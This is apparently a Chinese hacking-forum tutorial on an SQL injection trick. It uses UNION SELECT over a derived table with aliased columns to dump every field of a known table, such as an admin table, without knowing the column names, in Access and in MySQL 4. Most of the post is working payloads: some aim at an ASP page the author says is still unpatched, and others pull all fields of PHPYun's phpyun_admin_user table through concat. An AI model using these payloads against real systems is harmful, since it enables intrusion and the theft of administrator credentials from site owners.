技巧使用时间:知道“表名”但是猜不到“列名”的时候
前几天看了文章:http://www.91ri.org/11120.html,这里提到了access的注入小技巧,如果看懂了~大家就忽略前半篇吧~~
然后今天想想,mysql4是没有information_schema的,也就是说表名和列名和access一样,要靠猜,那么~~这个技巧或许可以用上
ACCESS篇:
不知道大家还记得http://sb.f4ck.org/thread-6017-1-1.html 这篇文章么? access偏移注入,对的这里有个前提,想要注入的表(一般是管理员表)比当前表(比如文章表)select的字段要少
但是,如果使用了今天说的这个小技巧,就可以无视这个限制~~~
前提还是一样的,需要知道表名~~比如这里是admin~~(PS:我也不知道怎么这么久了他还是不补注入漏洞。。。)
首先,我们之前注入时候就知道这里有8列,因此直接构造如下语句:
- x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select * from admin order by 1)
我们来分解下:
- union select 1,2,3,4,5,6,7,8 是匹配前面的列数
- from(x)是使用派生表~~
- select * from admin order by 1 是构造派生表
这里我们看下order by 5:
很明显,不再显示列了,说明没有5列,我们之前文章中也说了,admin只有4列
于是我们构造:
- x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)
还是分解下:
- union select 1,2,3,4,5,6,7,8 是匹配前面的列数
- select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 是将每一列做了别名,用途是之后可以用别名来引用我们不知道的列名
- where 1=2 目的是将前面的别名条件用假,从而显示后面的union select的内容
- union select * from admin 联合查询,得到真正需要的admin表所有列内容
接下来就要用到我们的别名了:
这里撸主没有测试成功文章中所说的”
field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5
“方法,只能直接使用别名,可能是撸主的access太烂了吧……
于是:
- .asp?id=-90 union select 1,a_4
- ,a_3,4,5,6,7,8 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)
这里其实就是将a_4,a_3显示出来而已,至于为什么是a_4,a_3,这就是一次次试验出来的……下次可能就是a_1,a_2
==================================================================================
MYSQL篇:
再来说说mysql,由于mysql4是没有information_schema的,因此或许可能会用到吧~
就拿php_yun做演示吧:
我们随便select两个字段:
- SELECT id,name FROM `phpyun_description`where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 1)a
这里注意与access不一样的地方,mysql不会自动给派生表定义别名,因此我们需要在最后加一个a,或者as a
不然会出什么问题,读者可以自己试试~~~
然后我们需要猜phpyun_admin_user的列数
- SELECT id,name FROM `phpyun_description`where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 6)a
猜出来是6列
之后我们构造“利用别名列查询出所有字段的子语句”:
- select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user
最后我们将其拼接起来:
- SELECT id,name FROM `phpyun_description`where id = 1 and 1=2 union select a_3,a_4 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a
恩,既然是mysql,就可以一起显示啦~~利用concat,就不需要一个个测试到底是那一列了
- SELECT id,name FROM `phpyun_description`where id = 1 and 1=2 union select 1,concat(a_1,0x23,a_2,0x23,a_3,0x23,a_4,0x23,a_5,0x23,a_6) from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a